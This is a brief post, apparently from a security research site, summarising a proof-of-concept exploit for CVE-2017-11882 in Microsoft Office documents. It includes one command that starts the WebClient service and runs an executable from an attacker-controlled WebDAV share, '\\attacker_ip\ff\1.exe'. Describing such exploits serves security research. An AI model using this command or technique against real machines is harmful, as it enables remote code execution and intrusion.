Aquaboutic | Focus Security Research | Vulnerability Exploit | POC


concept exploits for cve

Posted by zura at 2020-04-03

CVE-2017-11882: MITRE CVE-2017-11882: Research: Patch analysis: DEMO PoC exploitation: A simple PoC for CVE-2017-11882.This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server.The reason why this approach might be handy is a limitation of executed command length.However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine.This script creates simple document with several OLE objects.These objects exploits CVE-2017-11882, which results in sequential command execution. The first command which triggers WebClient service start may look like this:

cmd.exe /c start \\attacker_ip\ff \\attacker_ip\ff\1.exe

Usage example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.